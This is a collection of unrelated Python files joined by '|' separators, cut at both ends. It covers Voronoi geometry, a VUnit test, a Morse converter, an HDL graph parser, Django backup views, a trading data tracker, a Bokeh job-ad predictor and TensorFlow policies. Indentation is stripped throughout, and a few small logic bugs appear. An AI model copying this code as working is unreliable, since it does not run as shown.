for k in mobile_endpoints:
point = mobile_endpoints[k]
idx = np.argmin(np.sum((np.array(fixed_endpoints.values()) - point) ** 2, axis=1))
result[k] = list(fixed_endpoints)[idx]
return result
def voronoi_finite_polygons_2d(self, vor, radius=None):
"""Reconstruct infinite Voronoi regions in a
2D diagram to finite regions.
Source:
[https://stackoverflow.com/a/20678647/1595060](https://stackoverflow.com/a/20678647/1595060)
"""
if vor.points.shape[1] != 2:
raise ValueError("Requires 2D input")
new_regions = []
new_vertices = vor.vertices.tolist()
center = vor.points.mean(axis=0)
if radius is None:
radius = vor.points.ptp().max()
# Construct a map containing all ridges for a
# given point
all_ridges = {}
for (p1, p2), (v1, v2) in zip(vor.ridge_points,
vor.ridge_vertices):
all_ridges.setdefault(
p1, []).append((p2, v1, v2))
all_ridges.setdefault(
p2, []).append((p1, v1, v2))
# Reconstruct infinite regions
for p1, region in enumerate(vor.point_region):
vertices = vor.regions[region]
if all(v >= 0 for v in vertices):
# finite region
new_regions.append(vertices)
continue
# reconstruct a non-finite region
ridges = all_ridges[p1]
new_region = [v for v in vertices if v >= 0]
for p2, v1, v2 in ridges:
if v2 < 0:
v1, v2 = v2, v1
if v1 >= 0:
# finite ridge: already in the region
continue
# Compute the missing endpoint of an
# infinite ridge
t = vor.points[p2] - \
vor.points[p1] # tangent
t /= np.linalg.norm(t)
n = np.array([-t[1], t[0]]) # normal
midpoint = vor.points[[p1, p2]]. \
mean(axis=0)
direction = np.sign(
np.dot(midpoint - center, n)) * n
far_point = vor.vertices[v2] + \
direction * radius
new_region.append(len(new_vertices))
new_vertices.append(far_point.tolist())
# Sort region counterclockwise.
vs = np.asarray([new_vertices[v]
for v in new_region])
c = vs.mean(axis=0)
angles = np.arctan2(
vs[:, 1] - c[1], vs[:, 0] - c[0])
new_region = np.array(new_region)[
np.argsort(angles)]
new_regions.append(new_region.tolist())
return new_regions, np.asarray(new_vertices)
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014, Lars Asplund lars.anders.asplund@gmail.com
from __future__ import print_function
import unittest
from os.path import join, dirname, exists
from shutil import rmtree
try:
# Python 3.x (builtin)
from unittest.mock import Mock
except:
# Python 2.7 (needs separate install)
from mock import Mock
from vunit.test_runner import TestRunner
from vunit.test_report import TestReport, PASSED, FAILED
from vunit.test_list import TestList
class TestTestRunner(unittest.TestCase):
def setUp(self):
self._tests = []
self.output_path = join(dirname(__file__), "test_runner_out")
if exists(self.output_path):
rmtree(self.output_path)
self.report = TestReport()
self.runner = TestRunner(self.report, self.output_path)
def test_runs_testcases_in_order(self):
test_case1 = self.create_test("test1", True)
test_case2 = self.create_test("test2", False)
test_list = TestList()
test_list.add_test(test_case1)
test_list.add_test(test_case2)
self.runner.run(test_list)
test_case1.run.assert_called_once_with(join(self.output_path, "test1"))
test_case2.run.assert_called_once_with(join(self.output_path, "test2"))
self.assertEqual(self._tests, ["test1", "test2"])
self.assertTrue(self.report.result_of("test1").passed)
self.assertTrue(self.report.result_of("test2").failed)
def test_handles_python_exeception(self):
test_case = self.create_test("test", True)
test_list = TestList()
test_list.add_test(test_case)
test_case.run.side_effect = KeyError
self.runner.run(test_list)
self.assertTrue(self.report.result_of("test").failed)
def test_collects_output(self):
test_case = self.create_test("test", True)
test_list = TestList()
test_list.add_test(test_case)
output = "Output string, <xml>, </xml>\n"
def side_effect(*args, **kwargs):
print(output, end="")
return True
test_case.run.side_effect = side_effect
self.runner.run(test_list)
self.assertTrue(self.report.result_of("test").passed)
self.assertEqual(self.report.result_of("test").output, output)
def create_test(self, name, passed):
test_case = Mock(spec_set=TestCaseMockSpec)
test_case.configure_mock(name=name)
def run_side_effect(*args, **kwargs):
self._tests.append(name)
return passed
test_case.run.side_effect = run_side_effect
return test_case
class TestCaseMockSpec:
name = None
run = None
|
# conversor de código morse
# muita linha pra pouca coisa
import string
s2m = {'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.',\
'F': '..-.', 'G': '--.', 'H': '....', 'I': '..', 'J':'.---',\
'L':'.-..', 'M':'--','N':'-.','O':'---','P':'.--.','Q':'--.-',\
'R':'.-.','S':'...', 'T':'-','U':'..-','V':'...-','W':'.--',\
'X':'-..-','Y':'-.--','Z':'--..','1':'.----','2':'..---',\
'3':'...--','4':'....-','5':'.....','6':'-....','7':'--...',\
'8':'---..','9':'----.','0':'-----'}
upca = list(string.ascii_uppercase)
t = True
while t:
aux = []
f = []
o = i = b = True
while i:
op = str(input('1 - string para morse\n2 - morse para string\n>>> '))[0].strip()
if op == '1' or op == '2':
i = False
else:
print('\033[31mFavor selecionar uma opção válida\033[m')
while o:
if op == '1':
inp = str(input('\ninsira o texto a ser codificado: ')).strip().upper()
for n in inp:
aux.append(n)
for m in aux:
for k, v in s2m.items():
if k == m:
f.append(v)
if f == []:
print(f'\033[31mNão é possível CODIFICAR [{inp}]\033[m')
else:
print(f'\033[32m{inp} codificado é: \033[m', end=' ')
for p in f:
print(p, end=' ')
o = False
elif op == '2':
inp = str(input('\ninsira o texto a ser decodificado: '))
aux = inp.split(' ')
# print(aux)
for m in aux:
for k, v in s2m.items():
if v == m:
f.append(k)
if f == []:
print(f'\033[31m Não é possível DECODIFICAR [{inp}]\033[m')
else:
print(f'\033[32m{inp} decodificado é: \033[m', end=' ')
for p in f:
print(p, end=' ')
o = False
else:
print('\033[31mFavor digitar um valor válido\033[m')
dsc = str(input('\n\nDeseja sair do programa?[S/N]: '))[0].strip().lower()
if dsc == 's':
t = False
else:
continue |
# Standard Modules
import re
import sys
# Custom Modules
from hdl_signal import HDL_Signal
from connection import Connection
# Node Shapes
SIGNAL_NODE_SHAPE = "ellipse"
LOCAL_SIGNAL_NODE_SHAPE = "none"
FF_NODE_SHAPE = "square"
INPUT_NODE_SHAPE = "rectangle"
CONST_NODE_SHAPE = "none"
# Constant Prefix
CONST_HIERARCHY = 'const.'
def parse_file(file_name):
# counters
num_signals = 0
num_connections = 0
# Open the dot file for reading
with open(file_name, 'r') as f:
read_contents = f.read()
lines = read_contents.splitlines()
if "digraph G {" not in lines[0]:
sys.stderr.write("Error: Invalid file format\n")
sys.exit(1)
if len(lines) >= (1 << 20):
sys.stderr.write("Error: Over a million signals. Too many to handle\n")
sys.exit(1)
# Create signals dictionary
signals = {}
# Compile Regexes
signals_re = re.compile('\"[\w\.]+(\$[\d]+\$)?\" \[shape=([A-Za-z]+), label=\"([\w\.]+)(\$([\d]+)\$)?\[(\d+):(\d+)\]\"\]')
conns_re = re.compile('\"([\w\.]+)(\$([\d]+)\$)?\" -> \"([\w\.]+)(\$([\d]+)\$)?\"\[label=\"\[(\d+):(\d+)\]->\[(\d+):(\d+)\]\"\]')
# Parse all signals first
lineno = 1
print "Parsing signals..."
while "}" not in lines[lineno] and lineno < len(lines):
if "->" not in lines[lineno]:
# Parse signal information
m = signals_re.search(lines[lineno])
# Check if signal information was found
if (None == m):
print "Error: Bad (node) format at line " + str(lineno + 1)
sys.exit(2)
# Get signal info
fullname = m.group(3)
msb = int(m.group(6))
lsb = int(m.group(7))
shape = m.group(2)
if m.group(5):
array_ind = int(m.group(5))
else:
array_ind = None
# Check signal is NOT a const
if not fullname.startswith(CONST_HIERARCHY):
# Create signal object
s = HDL_Signal(fullname, msb, lsb, array_ind)
# Mark if signal is an INPUT or FLIPFLOP
if shape == INPUT_NODE_SHAPE:
s.isinput = True
elif shape == FF_NODE_SHAPE:
s.isff = True
# Add signal to dictionary
num_signals += 1
signals[s.fullname()] = s
lineno += 1
print "%d signals found." % (num_signals)
# Parse all connections
lineno = 1
print
print "Parsing connections..."
while "}" not in lines[lineno] and lineno < len(lines):
if "->" in lines[lineno]:
# Parse connection information
m = conns_re.search(lines[lineno])
# Check if conection information was found
if None == m:
print "Error: Bad (connection) format at line " + str(lineno + 1)
sys.exit(2)
# Check source signal is NOT a const
if not m.group(1).startswith(CONST_HIERARCHY):
# Get connection info (sink signal)
sink_msb = int(m.group(9))
sink_lsb = int(m.group(10))
if m.group(6):
sink_array_ind = int(m.group(6))
sink_sig = signals[m.group(4) + '[' + str(sink_array_ind) + ']']
else:
sink_array_ind = None
sink_sig = signals[m.group(4)]
# Get connection info (source signal)
source_msb = int(m.group(7))
source_lsb = int(m.group(8))
if m.group(3):
source_array_ind = int(m.group(3))
source_sig = signals[m.group(1) + '[' + str(source_array_ind) + ']']
else:
source_array_ind = None
source_sig = signals[m.group(1)]
# Add connection information
num_connections += 1
c = Connection(sink_sig, sink_msb, sink_lsb, source_sig, source_msb, source_lsb)
signals[sink_sig.fullname()].add_conn(c)
lineno += 1
print "%d connections found." % (num_connections)
print
assert "}" in lines[lineno]
assert lineno + 1 == len(lines)
return signals
|
# -*- coding: utf-8 -*-
""" Backup interface views. """
import json
import logging
import requests
import time
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponse
from django.utils.translation import gettext_lazy as _
from django.contrib.auth.decorators import login_required
from keystoneclient import exceptions
from storage.models import BackupContainer
from storage.utils import get_token_id, get_storage_endpoint
from vault import utils
from identity.keystone import Keystone, exceptions
from actionlogger.actionlogger import ActionLogger
log = logging.getLogger(__name__)
actionlog = ActionLogger()
def _check_backup_user(request, project_id):
try:
keystone = Keystone(request)
except exceptions.AuthorizationFailure:
msg = _('Unable to retrieve Keystone data')
messages.add_message(request, messages.ERROR, msg)
log.error(f'{request.user}: {msg}')
return False
if keystone.conn is None:
log.error('check_backup_user: Keystone connection error')
return False
all_users = keystone.user_list()
backup_user = None
for user in all_users:
if user.username == settings.BACKUP_USER:
backup_user = user
if backup_user is None:
log.error('check_backup_user: Undefined backup user')
return False
all_roles = keystone.role_list()
backup_role = None
for role in all_roles:
if role.name == settings.BACKUP_USER_ROLE:
backup_role = role
if backup_role is None:
log.error('check_backup_user: Undefined backup role')
return False
items = BackupContainer.objects.filter(project_id=project_id)
if items.count() == 0:
keystone.remove_user_role(project=project_id,
role=backup_role,
user=backup_user)
return True
try:
keystone.add_user_role(project=project_id,
role=backup_role,
user=backup_user)
except exceptions.Conflict:
log.info('backup_user already with role'.format(project_id))
return True
def _enable_backup(container, project_id, project_name):
create_url = 'http://{}:{}@{}/config/create'.format(
settings.BACKUP_API_USER,
settings.BACKUP_API_PASSWORD,
settings.BACKUP_API_URL
)
try:
req = requests.post(create_url, json={
'name': '{}_{}'.format(project_name, container),
'type': 'swift',
'parameters': {
'endpoint_type': 'admin',
'env_auth': 'true',
'tenant': project_name
}
})
except Exception as err:
log.error('Enable backup error: {}'.format(err))
return False
items = BackupContainer.objects.filter(container=container,
project_id=project_id)
if items.count() > 0:
return True
try:
item = BackupContainer(container=container,
project_id=project_id,
project_name=project_name)
item.save()
except Exception as err:
log.error('Enable backup error: {}'.format(err))
return False
return True
def _disable_backup(container, project_id, project_name):
delete_url = 'http://{}:{}@{}/config/delete'.format(
settings.BACKUP_API_USER,
settings.BACKUP_API_PASSWORD,
settings.BACKUP_API_URL
)
try:
req = requests.post(delete_url, json={
'name': '{}_{}'.format(project_name, container)
})
except Exception as err:
log.error('Disable backup error: {}'.format(err))
return False
items = BackupContainer.objects.filter(container=container,
project_id=project_id)
if items.count() == 0:
return True
try:
items[0].delete()
except Exception as err:
log.error('Disable backup error: {}'.format(err))
return False
return True
@utils.project_required
@login_required
def backup_restore(request, project):
container = request.POST.get("container")
project_name = request.POST.get("project_name")
backup_type = request.POST.get("backup_type")
content = {'message': ''}
status = 200
restore_url = 'http://{}:{}@{}/sync/copy'.format(
settings.BACKUP_API_USER,
settings.BACKUP_API_PASSWORD,
settings.BACKUP_API_URL
)
if backup_type == 'daily':
s3_bucket = 'swift-backup-daily'
elif backup_type == 'weekly':
s3_bucket = 'swift-backup-weekly'
else:
s3_bucket = 'swift-backup-monthly'
name = '{}_{}'.format(project_name, container)
ts = int(time.time())
restore_container = '{}_{}_{}'.format(container, backup_type, ts)
content['message'] = 'Backup restaurado no container: {}'.format(restore_container)
try:
req = requests.post(restore_url, json={
"srcFs": "amazon:/{}/{}/{}".format(s3_bucket, project_name, container),
"dstFs": "{}:/{}".format(name, restore_container),
"_async": True
})
result = req.json()
content['job'] = result['jobid']
except Exception as err:
log.error('Restore backup error: {}'.format(err))
content['message'] = 'Restore backup error: {}'.format(err)
return HttpResponse(json.dumps(content),
content_type='application/json',
status=500)
return HttpResponse(json.dumps(content),
content_type='application/json',
status=200)
def check_backup_conditions(request, container):
backup_object_count_value = int(settings.BACKUP_OBJECT_COUNT_VALUE)
backup_object_bytes_value = int(settings.BACKUP_OBJECT_BYTES_VALUE)
storage_url = get_storage_endpoint(request, 'adminURL')
headers = {'X-Storage-Token': get_token_id(request)}
url = '{0}/{1}'.format(storage_url, container)
response = requests.head(url, headers=headers,
verify=not settings.SWIFT_INSECURE)
if int(response.headers['X-Container-Object-Count']) >= backup_object_count_value:
return False, _('Error when activating container backup. Container cannot contain more than {} objects').format(backup_object_count_value)
if int(response.headers['X-Container-Bytes-Used']) >= backup_object_bytes_value:
return False, _('Error when activating container backup. Container cannot contain more than {}').format(backup_object_count_value)
return True, 'Success'
@utils.project_required
@login_required
def config_backup_container(request, project, container):
action = request.GET.get('status')
if action is None and action not in ['enabled', 'disabled']:
return HttpResponse(
json.dumps({'message': _('Wrong "status" parameter')}),
content_type='application/json',
status=400
)
project_id = request.session.get('project_id')
project_name = request.session.get('project_name')
status = 200
content = {'message': ''}
result = False
conditions, msg = check_backup_conditions(request, container)
if conditions:
if action == 'enabled':
result = _enable_backup(container, project_id, project_name)
msg = '{} "{}"'.format(_('Backup enabled for container'), container)
if action == 'disabled':
result = _disable_backup(container, project_id, project_name)
msg = '{} "{}"'.format(_('Backup disabled for container'), container)
if result:
check_ok = _check_backup_user(request, project_id)
if not check_ok:
_disable_backup(container, project_id, project_name)
status = 500
msg = _("Backup status error: can't set backup user permission")
log.error('{}. Project: {}, Container: {}'.format(msg,
project_name,
container))
else:
status = 500
msg = _('Error when updating container backup status')
log.error('{}. Project: {}, Container: {}'.format(msg,
project_name,
container))
else:
status = 412
content['message'] = msg
return HttpResponse(json.dumps(content),
content_type='application/json',
status=status)
def get_current_backup(container, project_id):
if not settings.BACKUP_ENABLED:
return None
query = BackupContainer.objects.filter(container=container,
project_id=project_id)
if query.count() > 0:
return query[0]
return None
@utils.project_required
@login_required
def container_backup_status(request, project, container):
project_id = request.session.get('project_id')
status, content = 200, {'status': 'disabled'}
if get_current_backup(container, project_id):
content['status'] = 'enabled'
return HttpResponse(json.dumps(content),
content_type='application/json',
status=status)
# storage API
def container_backup_list(request):
status, content = 200, []
items = BackupContainer.objects.all()
if items.count() > 0:
content = [{"container": i.container,
"project_id": i.project_id,
"project_name": i.project_name} for i in items]
else:
status = 404
log.info(_("Can't find any container to backup"))
return HttpResponse(json.dumps(content),
content_type='application/json',
status=status)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import pandas as pd
class DataBoard(object):
"""
Data tracker that holds current market data info
"""
def __init__(self):
self._hist_data_dict = {}
self._current_data_dict = {}
self._current_time = None
self._PLACEHOLDER = 'PLACEHOLDER'
self._data_index = None
def initialize_hist_data(self, data_key, data):
self._hist_data_dict[data_key] = data
def on_tick(self, tick):
if tick.full_symbol not in self._current_data_dict:
self._current_data_dict[tick.full_symbol] = None
self._current_data_dict[tick.full_symbol] = tick
self._current_time = tick.timestamp
def get_last_price(self, symbol):
"""
Returns the most recent price for a given ticker
"""
if symbol in self._current_data_dict.keys():
return self._current_data_dict[symbol].price
elif symbol in self._hist_data_dict.keys():
return self._hist_data_dict[symbol].loc[self._current_time, 'Close']
elif symbol[:2] in self._hist_data_dict.keys(): # FUT root symbol e.g. CL
return self._hist_data_dict[symbol[:2]].loc[self._current_time, symbol] # column series up to timestamp inclusive
else:
return None
def get_last_timestamp(self, symbol):
"""
Returns the most recent timestamp for a given ticker
"""
if symbol in self._current_data_dict.keys():
return self._current_data_dict[symbol].timestamp
elif self._PLACEHOLDER in self._current_data_dict:
return self._current_data_dict[self._PLACEHOLDER].timestamp
else:
return self._current_time
def get_current_timestamp(self):
return self._current_time
def get_hist_price(self, symbol, timestamp):
if symbol in self._hist_data_dict.keys():
return self._hist_data_dict[symbol][:timestamp] # up to timestamp inclusive
elif symbol[:2] in self._hist_data_dict.keys(): # FUT root symbol e.g. CL
return self._hist_data_dict[symbol[:2]][symbol][:timestamp] # column series up to timestamp inclusive
else:
return None
def get_hist_sym_time_index(self, symbol):
"""
retrieve historical calendar for a symbol
this is not look forwward
"""
if symbol in self._hist_data_dict.keys():
return self._hist_data_dict[symbol].index
elif symbol[:2] in self._hist_data_dict.keys(): # FUT root symbol e.g. CL
return self._hist_data_dict[symbol[:2]].index
else:
return None
def get_hist_time_index(self):
"""
retrieve historical calendar
this is not look forwward
"""
if self._data_index is None:
for k, v in self._hist_data_dict.items():
if self._data_index is None:
self._data_index = v.index
else:
self._data_index_data_stream = self._data_index.join(v.index, how='outer', sort=True)
return self._data_index |
# app.py
'''
bokeh serve --show app.py
'''
from numpy.random import random
import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow import keras
import datetime
from langdetect import detect_langs
from langdetect import DetectorFactory
DetectorFactory.seed = 0 # Deterministic results
import re
from sklearn.metrics.pairwise import cosine_similarity
from bert_embedding import BertEmbedding
from sklearn.preprocessing import OneHotEncoder
from bokeh.io import curdoc
from bokeh.layouts import column, row
from bokeh.plotting import ColumnDataSource, Figure
from bokeh.models.widgets import Select, TextInput, NumberFormatter
import bokeh
import bokeh.plotting
df = pd.read_csv('Data/jobcloud_features_v2.csv', delimiter = ';', parse_dates = ['start_dt', 'end_dt'])
dfe = pd.read_csv('Embeddings/sentence_embeddings_en_clean.csv', index_col='Unnamed: 0')
df_dfe = pd.concat([df, dfe], axis = 1)
df_dfe = df_dfe.drop_duplicates(subset='title_clean').reset_index()
df = df_dfe.loc[:, df.columns].copy()
dfe = df_dfe.loc[:, dfe.columns].copy()
print(df.info())
print(dfe.isnull().sum().sum())
del df_dfe
#DAYS = 10
#y_col = '%sd_view_cnt' % DAYS
#df = df.loc[(df['days_online'] >= DAYS) & (df[y_col] <= 7.0)]
############## default values ##############
string_input = 'Data Scientist' #df['title'].values[490]
contract_pct_from = 100
contract_pct_to = 100
package_id = 'D'
city = 'Zürich'
industry_name = 'Industrie diverse'
#package_id = 'B'
TOP_N = 9
############## bert ##############
bert_embedding = BertEmbedding(dtype='float32',
model='bert_12_768_12',
params_path=None,
max_seq_length=25,
batch_size=256)
features = ['contract_pct_from', 'contract_pct_to', 'month', 'package_id', 'industry_name',# 'days_online',
'city', 'title_num_words', 'title_aggressive', 'title_female', 'title_percent',
'title_location', 'title_diploma', 'title_chief', 'title_prob_en',
'title_prob_de', 'title_prob_fr']
features_no_cat = ['contract_pct_from', 'contract_pct_to',
'title_num_words', 'title_aggressive', 'title_female', 'title_percent',
'title_location', 'title_diploma', 'title_chief', 'title_prob_en',
'title_prob_de', 'title_prob_fr']
embeddings = [str(x) for x in range(768)]
enc = OneHotEncoder(handle_unknown='ignore')
enc.fit(df.loc[:, ['package_id', 'city', 'industry_name', 'month']])
############## functions ##############
def unique(sequence):
seen = set()
return [x for x in sequence if not (x in seen or seen.add(x))]
def get_clean_title(string_input):
string_input = re.sub(r'\BIn\b', '', string_input)
string_input = string_input.lower()
string_input = re.sub(r'[^\w&]', ' ', string_input)
string_input = re.sub(r'[0-9]', '', string_input)
string_input = re.sub(r'(\bm\b|\bw\b|\bf\b|\br\b|\bin\b|\binnen\b|\bmw\b|\bdach\b|\bd\b|\be\b|\bi\b)', '', string_input)
string_input = re.sub(r'&a\b', 'm&a', string_input)
string_input = re.sub(r'(\bdipl\b|\bfachausweis\b|\babschluss\b|diplom|phd|msc|\buni\b|\bfh\b|\bfh\b|\beth\b|\btu\b)', '', string_input)
string_input = re.sub(r'[ ]{2,}', ' ', string_input)
string_input = string_input.strip()
return string_input
def predict_views_from_string(string_input = None,
string_input_embedding = None,
contract_pct_from=100,
contract_pct_to=100,
package_id='D',
city='Zürich',
industry_name='Industrie diverse'):
if string_input_embedding is None:
month = datetime.datetime.now().strftime('%B')
title_num_words = len(string_input.split())
title_aggressive = (string_input.isupper()) | ('!' in string_input)
if re.compile(r'((m/w)|(w/m)|(m/f)|(h/f)|/ -in|/in|\(in\))').search(string_input):
title_female = True
else:
title_female = False
title_percent = '%' in string_input
if re.compile(r'(\bRegion\b|\bBezirk\b|\bStadt\b|\bOrt\b)').search(string_input):
title_location = True
else:
title_location = False
if re.compile(r'(Dipl\.|Diplom|PhD|MSc|\bUni\b|\bFH\b|\bETH\b|\bTU\b)').search(string_input):
title_diploma = True
else:
title_diploma = False
title_chief = True if re.compile(r'\bC.O\b').search(string_input) else False
lang_dict = {'en': 0, 'de':0, 'fr':0}
for lang_input in detect_langs(string_input):
if lang_input.lang in lang_dict:
lang_dict[lang_input.lang] = lang_input.prob
title_prob_en = lang_dict['en']
title_prob_de = lang_dict['de']
title_prob_fr = lang_dict['fr']
string_input = get_clean_title(string_input)
titles_embeddings = bert_embedding([string_input, '_'])
string_input_embedding = np.mean( np.array(titles_embeddings[0][1]), axis=0 )
df_input_string = pd.DataFrame([[contract_pct_from, contract_pct_to, month, package_id, industry_name,
city, title_num_words, title_aggressive, title_female, title_percent,
title_location, title_diploma, title_chief, title_prob_en,
title_prob_de, title_prob_fr] + list(string_input_embedding)],
columns = features + embeddings)
else:
df_input_string_ = df.loc[df['title'] == string_input, :].head(1).copy()
df_input_string = pd.concat([df_input_string_, dfe.loc[df_input_string_.index, :]], axis = 1)
df_input_string['contract_pct_from'] = contract_pct_from
df_input_string['contract_pct_to'] = contract_pct_to
df_input_string['package_id'] = package_id
df_input_string['city'] = city
df_input_string['month'] = datetime.datetime.now().strftime('%B')
df_input_string['industry_name'] = industry_name
X_input = np.concatenate((df_input_string.loc[:, features_no_cat + embeddings].values,
enc.transform(df_input_string.loc[:, ['package_id', 'city', 'industry_name', 'month']]).toarray()), axis=1)
print(round(model.predict(X_input)[0][0], 2))
return round(model.predict(X_input)[0][0], 2)
def get_most_similar_auto_complete(df : pd.DataFrame,
dfe: pd.DataFrame,
string_input : str,
top_n : int=5,
contract_pct_from=contract_pct_from,
contract_pct_to=contract_pct_to,
package_id=package_id,
city=city,
industry_name=industry_name):
string_input_clean = get_clean_title(string_input)
titles_embeddings = bert_embedding([string_input_clean, '_'])
string_input_embedding = np.mean( np.array(titles_embeddings[0][1]), axis=0 )
df_top_n = pd.DataFrame(cosine_similarity(string_input_embedding.reshape(1, -1), dfe.loc[:, :])[0], columns = ['similarity']).sort_values('similarity', ascending = False).head(top_n)
indeces_most_similar = df_top_n.index
print(indeces_most_similar)
print(df_top_n['similarity'])
print(df.loc[indeces_most_similar, ['title']].values)
titles_to_show = [[string_input]] + list(df.loc[indeces_most_similar, ['title']].values)
titles_to_show_ = [x[0] for x in titles_to_show]
titles_to_show_ = unique(titles_to_show_)
titles_to_show = [[x] for x in titles_to_show_]
pred_input = predict_views_from_string(string_input = string_input,
contract_pct_from=contract_pct_from,
contract_pct_to=contract_pct_to,
package_id=package_id,
city=city,
industry_name=industry_name)
preds = [predict_views_from_string(string_input = t[0],
string_input_embedding=True,
contract_pct_from=contract_pct_from,
contract_pct_to=contract_pct_to,
package_id=package_id,
city=city,
industry_name=industry_name) for t in titles_to_show[1:]]
preds = [pred_input] + preds
title_no = [str(i+1) for i, t in enumerate(titles_to_show)]
return dict(title=titles_to_show, pred=preds, title_no = title_no)
############## neural net ##############
def create_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(829, )),
tf.keras.layers.Dense(200, activation=tf.nn.relu),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(1)
])
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['mean_squared_error'])
return model
model = create_model()
model.load_weights('Model/')
############## sources ##############
source3 = ColumnDataSource(data=get_most_similar_auto_complete(df, dfe, string_input, TOP_N))
############## plot ##############
title_no = [str(x) for x in range(TOP_N+1, 0, -1)] #['4', '3', '2', '1']
p = Figure(y_range=title_no, tools="", toolbar_location=None, x_range=[0, 3], x_axis_label='Expected View Count', plot_width=500, plot_height=300)
p.hbar(y = 'title_no', right = 'pred', fill_alpha=0.8, height= 0.1, source=source3)
############## inputs ##############
string_input2 = TextInput(value='Data Scientist', title="Enter Your Job Ad Title here")
select_city = Select(options=list(df['city'].unique()), value='Zürich', title='choose a city')
select_package = Select(options=['A', 'B', 'C', 'D'], value='D', title='choose a package')
select_contract_pct_from = Select(options=[str(x) for x in range(10, 110, 10)], value='100', title='choose from %')
select_contract_pct_to = Select(options=[str(x) for x in range(10, 110, 10)], value='100', title='choose to %')
select_industry = Select(options=list(df['industry_name'].unique()), value='Industrie diverse', title='choose an industry')
############## updates ##############
def update_pred(attrname, old, new):
string_input = string_input2.value
package_id = select_package.value
contract_pct_from = select_contract_pct_from.value
contract_pct_to = select_contract_pct_to.value
industry_name = select_industry.value
city = select_city.value
source3.data = get_most_similar_auto_complete(df, dfe, string_input=string_input, top_n=TOP_N,
package_id=package_id,
contract_pct_from=contract_pct_from,
contract_pct_to=contract_pct_to,
industry_name=industry_name,
city=city)
string_input2.on_change('value', update_pred)
select_package.on_change('value', update_pred)
select_contract_pct_from.on_change('value', update_pred)
select_contract_pct_to.on_change('value', update_pred)
select_industry.on_change('value', update_pred)
select_city.on_change('value', update_pred)
############## tables ##############
columns = [bokeh.models.TableColumn(field="title", title="title"),
bokeh.models.TableColumn(field="pred", title="pred", formatter=NumberFormatter(format='0[.]00)')),
bokeh.models.TableColumn(field="title_no", title="title_no")]
data_table = bokeh.models.DataTable(source=source3, width=400, height=280,
columns =columns)
layout = row(column(select_city,
select_industry,
string_input2,
select_package,
select_contract_pct_from,
select_contract_pct_to),
column(data_table),
column(row(height= 20), row(p))) #, height=200
curdoc().add_root(layout) |
from __future__ import division
import time
from pyglet.window import key as pygkey
import tensorflow as tf
import numpy as np
import scipy.special
from .models import TFModel
from . import utils
from . import encoder_models
class MLPPolicy(TFModel):
def __init__(
self,
*args,
n_obs_dims,
n_act_dims,
discrete_act=True,
bal_val_of_act=None,
n_layers=2,
layer_size=32,
**kwargs
):
super().__init__(*args, **kwargs)
if type(n_obs_dims) != tuple:
n_obs_dims = (n_obs_dims,)
if bal_val_of_act is None and discrete_act:
bal_val_of_act = lambda act: np.argmax(act, axis=1)
self.n_layers = n_layers
self.layer_size = layer_size
self.n_act_dims = n_act_dims
self.bal_val_of_act = bal_val_of_act
self.discrete_act = discrete_act
self.n_obs_dims = n_obs_dims
self.data_keys = ['obses', 'actions']
self.obs_ph = tf.placeholder(tf.float32, [None] + list(n_obs_dims))
self.act_ph = tf.placeholder(tf.float32, [None, n_act_dims])
self.weights_ph = tf.placeholder(tf.float32, [None])
self.logits = self.build_model(self.obs_ph, is_train=True)
self.eval_logits = self.build_model(self.obs_ph, is_train=False)
def build_losses(logits):
if self.discrete_act:
losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.act_ph, logits=logits)
else:
losses = tf.reduce_mean((self.act_ph - logits)**2, axis=1)
if self.bal_val_of_act is not None:
weights = self.weights_ph
loss = tf.reduce_sum(weights * losses) / tf.reduce_sum(weights)
else:
loss = tf.reduce_mean(losses)
return loss
self.loss = build_losses(self.logits)
self.eval_loss = build_losses(self.eval_logits)
def act(self, obses, batch_size=32):
def op(batch):
feed_dict = {self.obs_ph: batch}
return self.sess.run(self.eval_logits, feed_dict=feed_dict)
logits = utils.batch_op(obses, batch_size, op)
if self.discrete_act:
logits -= scipy.special.logsumexp(logits, axis=1, keepdims=True)
return logits
def eval_log_prob(self, obses, acts):
logits = self.act(obses)
if self.discrete_act:
return np.sum(acts*logits, axis=1)
else:
return -np.mean((acts-logits)**2, axis=1)
def format_batch(self, batch):
batch_actions = batch['actions']
feed_dict = {
self.obs_ph: batch['obses'],
self.act_ph: batch_actions
}
if self.bal_val_of_act is not None:
bal_weights = utils.bal_weights_of_batch(self.bal_val_of_act(batch_actions))
feed_dict[self.weights_ph] = bal_weights
return feed_dict
def build_model(self, obs, eps=1e-9, is_train=True):
return utils.build_mlp(
obs,
self.n_act_dims,
self.scope,
n_layers=self.n_layers,
size=self.layer_size,
activation=tf.nn.relu,
output_activation=None
)
class ConvPolicy(MLPPolicy):
def act(self, obses):
return super().act(obses.astype(float) / 255.)
def format_batch(self, batch):
batch['obses'] = batch['obses'].astype(float) / 255.
return super().format_batch(batch)
def build_model(self, obs, is_train=True):
with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):
logits = encoder_models.build_celeba_encoder(obs, self.n_act_dims, is_train=is_train)
return super().build_model(logits, is_train=is_train)
class HumanCarUser(object):
def __init__(self):
self.acc_mag = 1
self.steer_mag = 0.5
self.init_acc_period = 100
self.action = None
self.curr_step = None
def reset(self, *args, **kwargs):
self.curr_step = 0
self.action = np.zeros(3)
def __call__(self, *args, **kwargs):
if (self.curr_step % (2 * self.init_acc_period)) < self.init_acc_period:
self.action[1] = self.acc_mag
else:
self.action[1] = 0
self.curr_step += 1
time.sleep(0.1)
return self.action
def key_press(self, key, mod):
a = int(key)
if a == pygkey.LEFT:
self.action[0] = -self.steer_mag
elif a == pygkey.RIGHT:
self.action[0] = self.steer_mag
def key_release(self, key, mod):
a = int(key)
if (a == pygkey.LEFT and self.action[0] == -self.steer_mag) or (
a == pygkey.RIGHT and self.action[0] == self.steer_mag):
self.action[0] = 0
|
import numpy as np
def hartmann3(x):
alpha = [1.0, 1.2, 3.0, 3.2]
A = np.array([[3.0, 10.0, 30.0],
[0.1, 10.0, 35.0],
[3.0, 10.0, 30.0],
